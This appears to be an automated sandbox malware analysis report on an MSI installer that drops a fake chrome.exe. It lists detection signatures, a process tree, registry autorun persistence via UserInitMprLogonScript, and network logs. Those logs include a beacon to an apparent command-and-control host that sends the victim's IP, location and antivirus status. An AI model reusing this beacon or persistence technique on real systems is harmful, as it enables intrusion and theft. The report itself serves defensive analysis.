Windows Analysis Report
nf963-5d-qns6-w812.msi

Overview

General Information

Sample name: nf963-5d-qns6-w812.msi
Analysis ID: 1498175
MD5: bfab767af344fa22cfadfd11144ab5fe
SHA1: 8c2bc0fd1fabf0410e5122c2b5929c34f306545a
SHA256: 5f75b66b8bb89295ff96bb25dc3d37c6b6f93ebc9507ef1c16ff5dc8cddbeef7
Tags: msi
Infos:

Detection

Score: 72
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Detected unpacking (creates a PE file in dynamic memory)
AI detected suspicious sample
Creates an undocumented autostart registry key
Machine Learning detection for dropped file
PE file contains section with special chars
Queries Google from non browser process on port 80
Switches to a custom stack to bypass stack traces
Abnormal high CPU Usage
Checks for available system drives (often done to infect USB drives)
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to dynamically determine API calls
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Entry point lies outside standard sections
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sigma detected: Common Autorun Keys Modification
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • msiexec.exe (PID: 4856 cmdline: "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\nf963-5d-qns6-w812.msi" MD5: E5DA170027542E25EDE42FC54C929077)
  • msiexec.exe (PID: 2060 cmdline: C:\Windows\system32\msiexec.exe /V MD5: E5DA170027542E25EDE42FC54C929077)
    • msiexec.exe (PID: 2476 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding E1CF8BADC61849C4C5214BC163FD5145 MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • chrome.exe (PID: 6716 cmdline: C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exe MD5: DD36EA28C576FB0AD109B42D3D6C9F96)
        • chrome.exe (PID: 2844 cmdline: C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exe MD5: DD36EA28C576FB0AD109B42D3D6C9F96)
          • chrome.exe (PID: 2000 cmdline: C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exe MD5: DD36EA28C576FB0AD109B42D3D6C9F96)
            • chrome.exe (PID: 3164 cmdline: C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exe MD5: DD36EA28C576FB0AD109B42D3D6C9F96)
              • chrome.exe (PID: 4960 cmdline: C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exe MD5: DD36EA28C576FB0AD109B42D3D6C9F96)
                • chrome.exe (PID: 4820 cmdline: C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exe MD5: DD36EA28C576FB0AD109B42D3D6C9F96)
  • cleanup
No configs have been found
No yara matches

System Summary

Source: Registry Key set, Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split), wagga (name): Data: Details: C:\Windows\SysWOW64\cmd /c C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exe, ProcessId: 4820, TargetObject: HKEY_CURRENT_USER\Environment\UserInitMprLogonScript
No Suricata rule has matched

AV Detection

Source: Submitted Sample | Integrated Neural Analysis Model: Matched 99.8% probability
Source: C:\Users\user\Chrome\Application\118.0.5993.120\chrome_elf.dll | Joe Sandbox ML: detected

Compliance

Source: C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exe | Unpacked PE file: 4.2.chrome.exe.400000.0.unpack
Source: C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exe | Unpacked PE file: 5.2.chrome.exe.400000.0.unpack
Source: C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exe | Unpacked PE file: 7.2.chrome.exe.400000.0.unpack
Source: unknown | HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 34.117.59.81:443 -> 192.168.2.4:49732 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 198.20.110.106:443 -> 192.168.2.4:49734 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 216.58.212.164:443 -> 192.168.2.4:49740 version: TLS 1.2
Source: Binary string: C:\b\s\w\ir\cache\builder\src\out\Release\initialexe\chrome.exe.pdb source: chrome.exe
Source: C:\Windows\System32\msiexec.exe | File opened: z:
Source: C:\Windows\System32\msiexec.exe | File opened: x:
Source: C:\Windows\System32\msiexec.exe | File opened: v:
Source: C:\Windows\System32\msiexec.exe | File opened: t:
Source: C:\Windows\System32\msiexec.exe | File opened: r:
Source: C:\Windows\System32\msiexec.exe | File opened: p:
Source: C:\Windows\System32\msiexec.exe | File opened: n:
Source: C:\Windows\System32\msiexec.exe | File opened: l:
Source: C:\Windows\System32\msiexec.exe | File opened: j:
Source: C:\Windows\System32\msiexec.exe | File opened: h:
Source: C:\Windows\System32\msiexec.exe | File opened: f:
Source: C:\Windows\System32\msiexec.exe | File opened: b:
Source: C:\Windows\System32\msiexec.exe | File opened: y:
Source: C:\Windows\System32\msiexec.exe | File opened: w:
Source: C:\Windows\System32\msiexec.exe | File opened: u:
Source: C:\Windows\System32\msiexec.exe | File opened: s:
Source: C:\Windows\System32\msiexec.exe | File opened: q:
Source: C:\Windows\System32\msiexec.exe | File opened: o:
Source: C:\Windows\System32\msiexec.exe | File opened: m:
Source: C:\Windows\System32\msiexec.exe | File opened: k:
Source: C:\Windows\System32\msiexec.exe | File opened: i:
Source: C:\Windows\System32\msiexec.exe | File opened: g:
Source: C:\Windows\System32\msiexec.exe | File opened: e:
Source: C:\Windows\System32\msiexec.exe | File opened: c:
Source: C:\Windows\System32\msiexec.exe | File opened: a:
Source: chrome.exe | Memory has grown: Private usage: 1MB later: 12MB

Networking

Source: C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exe | HTTP traffic: GET / HTTP/1.1 Accept: */* Accept-Encoding: gzip User-Agent: Mozilla/5.0 (Linux; Android 8.0.0; SM-G955U Build/R16NW) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Mobile Safari/537.36 Connection: Keep-Alive Host: google.com
Source: C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exe | HTTP traffic: GET / HTTP/1.1 Accept: */* Accept-Encoding: gzip User-Agent: Mozilla/5.0 (Linux; Android 8.0.0; SM-G955U Build/R16NW) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Mobile Safari/537.36 Connection: Keep-Alive Host: www.google.com
Source: Joe Sandbox View | IP Address: 188.114.97.3
Source: Joe Sandbox View | IP Address: 34.117.59.81
Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | HTTP traffic detected: GET /p/zNgG4G HTTP/1.1 Accept: */* Accept-Encoding: gzip Host: codewith.it User-Agent: Mozilla/5.0 (Linux; Android 8.0.0; SM-G955U Build/R16NW) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Mobile Safari/537.36 Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /json HTTP/1.1 Accept: */* Accept-Encoding: gzip Host: ipinfo.io User-Agent: Mozilla/5.0 (Linux; Android 8.0.0; SM-G955U Build/R16NW) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Mobile Safari/537.36 Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /wp-admin/js/cnt/system/conta.php?IDR=8.46.123.33&PC=818225&DTF=23/08/2024%2013:16:15&UF=New%20York&CAP=New%20York%20City&APP=%20Nao%20tem%20aplicativo&ANT=Topaz%20OFD%20Nao&SPM=AGOSTO HTTP/1.1 Accept: */* Accept-Encoding: gzip Host: www.fuhnwijude.com User-Agent: Mozilla/5.0 (Linux; Android 8.0.0; SM-G955U Build/R16NW) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Mobile Safari/537.36 Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /?gws_rd=ssl HTTP/1.1 Accept: */* Accept-Encoding: gzip User-Agent: Mozilla/5.0 (Linux; Android 8.0.0; SM-G955U Build/R16NW) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Mobile Safari/537.36 Connection: Keep-Alive Host: www.google.com Cookie: AEC=AVYB7cpAq0GIpRy9NZo9DvJvUBBN_YmsGsCKv3vpUtvLYDCsdqWAVvUU9g
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 Accept: */* Accept-Encoding: gzip User-Agent: Mozilla/5.0 (Linux; Android 8.0.0; SM-G955U Build/R16NW) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Mobile Safari/537.36 Connection: Keep-Alive Host: google.com
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 Accept: */* Accept-Encoding: gzip User-Agent: Mozilla/5.0 (Linux; Android 8.0.0; SM-G955U Build/R16NW) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Mobile Safari/537.36 Connection: Keep-Alive Host: www.google.com
Source: global traffic | DNS traffic detected: DNS query: codewith.it
Source: global traffic | DNS traffic detected: DNS query: ipinfo.io
Source: global traffic | DNS traffic detected: DNS query: www.fuhnwijude.com
Source: global traffic | DNS traffic detected: DNS query: google.com
Source: global traffic | DNS traffic detected: DNS query: www.google.com
Source: chrome.exe | String found in binary or memory: http://csrc.nist.gov/publications/drafts/800-67-rev1/SP-800-67-rev1-2_July-2011.pdf
Source: chrome.exe | String found in binary or memory: http://csrc.nist.gov/publications/drafts/fips180-4/Draft-FIPS180-4_Feb2011.pdf
Source: chrome.exe | String found in binary or memory: http://csrc.nist.gov/publications/fips/fips46-3/fips46-3.pdf
Source: chrome.exe | String found in binary or memory: http://csrc.nist.gov/publications/nistpubs/800-38a/sp800-38a.pdf
Source: chrome.exe | String found in binary or memory: http://schema.org/SiteNavigationElement
Source: chrome.exe | String found in binary or memory: http://tools.ietf.org/html/rfc1321
Source: chrome.exe | String found in binary or memory: http://tools.ietf.org/html/rfc4648
Source: chrome.exe | String found in binary or memory: http://www.csrc.nist.gov/publications/fips/fips197/fips-197.pdf
Source: chrome.exe | String found in binary or memory: http://www.ietf.org/rfc/rfc3447.txt
Source: chrome.exe | String found in binary or memory: http://www.itl.nist.gov/fipspubs/fip180-1.htm
Source: chrome.exe | String found in binary or memory: http://www.movable-type.co.uk/scripts/xxtea.pdf
Source: chrome.exe | String found in binary or memory: http://www.schneier.com/paper-blowfish-fse.html
Source: chrome.exe | String found in binary or memory: http://www.schneier.com/paper-twofish-paper.pdf
Source: chrome.exe | String found in binary or memory: https://codewith.it/
Source: chrome.exe | String found in binary or memory: https://codewith.it/favicon.ico
Source: chrome.exe | String found in binary or memory: https://codewith.it/img/browserconfig.xml
Source: chrome.exe | String found in binary or memory: https://crashpad.chromium.org/
Source: chrome.exe | String found in binary or memory: https://crashpad.chromium.org/bug/new
Source: chrome.exe | String found in binary or memory: https://csp.withgoogle.com/csp/gws/other-hp
Source: chrome.exe | String found in binary or memory: https://ipinfo.io/missingauth
Source: chrome.exe | String found in binary or memory: https://unpkg.com/monaco-editor
Source: chrome.exe | String found in binary or memory: https://www.google.com/?gws_rd=ssl
Source: chrome.exe | String found in binary or memory: https://www.googletagmanager.com/gtag/js?id=G-3FMJXZBGEP
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown | Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown | Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown | Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknownHTTPS traffic detected: 34.117.59.81:443 -> 192.168.2.4:49732 version: TLS 1.2
Source: unknownHTTPS traffic detected: 198.20.110.106:443 -> 192.168.2.4:49734 version: TLS 1.2
Source: unknownHTTPS traffic detected: 216.58.212.164:443 -> 192.168.2.4:49740 version: TLS 1.2

System Summary

Source: chrome_elf.dll.2.dr Static PE information: section name: .O%.
Source: chrome_elf.dll.2.dr Static PE information: section name: .l`q
Source: chrome_elf.dll.2.dr Static PE information: section name: .p}\
Source: C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exe Process Stats: CPU usage > 49%
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\4fdcd3.msi
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSIE00F.tmp
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSIE0EA.tmp
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSIE243.tmp
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSIE3AC.tmp
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSIE42A.tmp
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\inprogressinstallinfo.ipi
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\SourceHash{1F409DE5-F41D-4B97-A3CD-EF30B43C9B23}
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSIE515.tmp
Source: C:\Windows\System32\msiexec.exe File deleted: C:\Windows\Installer\MSIE00F.tmp
Source: Joe Sandbox View Dropped File: C:\Users\user\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.14 6B3265B2F82E206BED8B6CD56C2A3F0FA9D8FD027E19A9713DA618B177D9264B
Source: Joe Sandbox View Dropped File: C:\Users\user\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.50 34397DE1D9DC94AAA08CA1D267B64B0E12CCABA008BABE6F592E563F00DC874B
Source: C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exe Code function: String function: 00DB9F70 appears 42 times
Source: C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exe Code function: String function: 00E0E040 appears 58 times
Source: C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exe Code function: String function: 00E54060 appears 234 times
Source: MpClient.dll.1.dr Static PE information: Resource name: RT_VERSION type: Intel ia64 COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: MpClient.dll.1.dr Static PE information: Number of sections : 11 > 10
Source: chrome_elf.dll.2.dr Static PE information: Number of sections : 16 > 10
Source: classification engine Classification label: mal72.evad.winMSI@16/167@5/5
Source: C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exe Code function: 3_2_00E715D0 FormatMessageW,GetLastError,LocalFree
Source: C:\Windows\System32\msiexec.exe File created: C:\Users\user\AppData\Roaming\Microsoft\CMLE55E.tmp
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\TEMP\~DF3EE4656B409D7E1E.TMP
Source: C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: chrome.exe String found in binary or memory: Try '%ls --help' for more information.
Source: unknown Process created: C:\Windows\System32\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\nf963-5d-qns6-w812.msi"
Source: unknown Process created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
Source: C:\Windows\System32\msiexec.exe Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding E1CF8BADC61849C4C5214BC163FD5145
Source: C:\Windows\SysWOW64\msiexec.exe Process created: C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exe C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exe
Source: C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exe Process created: C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exe C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exe
Source: C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exe Process created: C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exe C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exe
Source: C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exe Process created: C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exe C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exe
Source: C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exe Process created: C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exe C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exe
Source: C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exe Process created: C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exe C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exe
Source: C:\Windows\System32\msiexec.exe Section loaded: apphelp.dll
Source: C:\Windows\System32\msiexec.exe Section loaded: aclayers.dll
Source: C:\Windows\System32\msiexec.exe Section loaded: sfc.dll
Source: C:\Windows\System32\msiexec.exe Section loaded: sfc_os.dll
Source: C:\Windows\System32\msiexec.exe Section loaded: msi.dll
Source: C:\Windows\System32\msiexec.exe Section loaded: srpapi.dll
Source: C:\Windows\System32\msiexec.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\msiexec.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\msiexec.exe Section loaded: tsappcmp.dll
Source: C:\Windows\System32\msiexec.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\msiexec.exe Section loaded: textinputframework.dll
Source: C:\Windows\System32\msiexec.exe Section loaded: coreuicomponents.dll
Source: C:\Windows\System32\msiexec.exe Section loaded: coremessaging.dll
Source: C:\Windows\System32\msiexec.exe Section loaded: ntmarta.dll
Source: C:\Windows\System32\msiexec.exe Section loaded: wintypes.dll
Source: C:\Windows\System32\msiexec.exe Section loaded: wintypes.dll
Source: C:\Windows\System32\msiexec.exe Section loaded: wintypes.dll
Source: C:\Windows\System32\msiexec.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\msiexec.exe Section loaded: wldp.dll
Source: C:\Windows\System32\msiexec.exe Section loaded: propsys.dll
Source: C:\Windows\System32\msiexec.exe Section loaded: textshaping.dll
Source: C:\Windows\System32\msiexec.exe Section loaded: netapi32.dll
Source: C:\Windows\System32\msiexec.exe Section loaded: wkscli.dll
Source: C:\Windows\System32\msiexec.exe Section loaded: netutils.dll
Source: C:\Windows\System32\msiexec.exe Section loaded: version.dll
Source: C:\Windows\System32\msiexec.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\msiexec.exe Section loaded: profapi.dll
Source: C:\Windows\System32\msiexec.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\msiexec.exe Section loaded: pcacli.dll
Source: C:\Windows\System32\msiexec.exe Section loaded: mpr.dll
Source: C:\Windows\System32\msiexec.exe Section loaded: apphelp.dll
Source: C:\Windows\System32\msiexec.exe Section loaded: aclayers.dll
Source: C:\Windows\System32\msiexec.exe Section loaded: sfc.dll
Source: C:\Windows\System32\msiexec.exe Section loaded: sfc_os.dll
Source: C:\Windows\System32\msiexec.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\msiexec.exe Section loaded: msi.dll
Source: C:\Windows\System32\msiexec.exe Section loaded: tsappcmp.dll
Source: C:\Windows\System32\msiexec.exe Section loaded: userenv.dll
Source: C:\Windows\System32\msiexec.exe Section loaded: profapi.dll
Source: C:\Windows\System32\msiexec.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\msiexec.exe Section loaded: netapi32.dll
Source: C:\Windows\System32\msiexec.exe Section loaded: wkscli.dll
Source: C:\Windows\System32\msiexec.exe Section loaded: netutils.dll
Source: C:\Windows\System32\msiexec.exe Section loaded: srclient.dll
Source: C:\Windows\System32\msiexec.exe Section loaded: spp.dll
Source: C:\Windows\System32\msiexec.exe Section loaded: powrprof.dll
Source: C:\Windows\System32\msiexec.exe Section loaded: vssapi.dll
Source: C:\Windows\System32\msiexec.exe Section loaded: vsstrace.dll
Source: C:\Windows\System32\msiexec.exe Section loaded: umpdc.dll
Source: C:\Windows\System32\msiexec.exe Section loaded: wldp.dll
Source: C:\Windows\System32\msiexec.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\msiexec.exe Section loaded: version.dll
Source: C:\Windows\System32\msiexec.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\msiexec.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\msiexec.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\msiexec.exe Section loaded: rstrtmgr.dll
Source: C:\Windows\System32\msiexec.exe Section loaded: ncrypt.dll
Source: C:\Windows\System32\msiexec.exe Section loaded: ntasn1.dll
Source: C:\Windows\System32\msiexec.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\msiexec.exe Section loaded: pcacli.dll
Source: C:\Windows\System32\msiexec.exe Section loaded: mpr.dll
Source: C:\Windows\System32\msiexec.exe Section loaded: ntmarta.dll
Source: C:\Windows\System32\msiexec.exe Section loaded: cabinet.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: aclayers.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: sfc.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: sfc_os.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: msi.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: netapi32.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: logoncli.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: samcli.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: netapi32.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: logoncli.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: samcli.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: netapi32.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: logoncli.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: samcli.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: netapi32.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: logoncli.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: samcli.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: windows.ui.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: windowmanagementapi.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: textinputframework.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: inputhost.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: coreuicomponents.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: coremessaging.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: coremessaging.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: twinapi.appcore.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: twinapi.appcore.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: windows.ui.immersive.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: netapi32.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: logoncli.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: samcli.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: shfolder.dll
Source: C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exeSection loaded: mpr.dllJump to behavior
Source: C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exeSection loaded: wsock32.dllJump to behavior
Source: C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exeSection loaded: magnification.dllJump to behavior
Source: C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exeSection loaded: wtsapi32.dllJump to behavior
Source: C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exeSection loaded: d3d9.dllJump to behavior
Source: C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exeSection loaded: dwmapi.dllJump to behavior
Source: C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exeSection loaded: mpr.dllJump to behavior
Source: C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exeSection loaded: wsock32.dllJump to behavior
Source: C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exeSection loaded: magnification.dllJump to behavior
Source: C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exeSection loaded: wtsapi32.dllJump to behavior
Source: C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exeSection loaded: d3d9.dllJump to behavior
Source: C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exeSection loaded: dwmapi.dllJump to behavior
Source: C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exeSection loaded: dwmapi.dllJump to behavior
Source: C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exeSection loaded: mpr.dllJump to behavior
Source: C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exeSection loaded: wsock32.dllJump to behavior
Source: C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exeSection loaded: magnification.dllJump to behavior
Source: C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exeSection loaded: wtsapi32.dllJump to behavior
Source: C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exeSection loaded: d3d9.dllJump to behavior
Source: C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exeSection loaded: dwmapi.dllJump to behavior
Source: C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exeSection loaded: dwmapi.dllJump to behavior
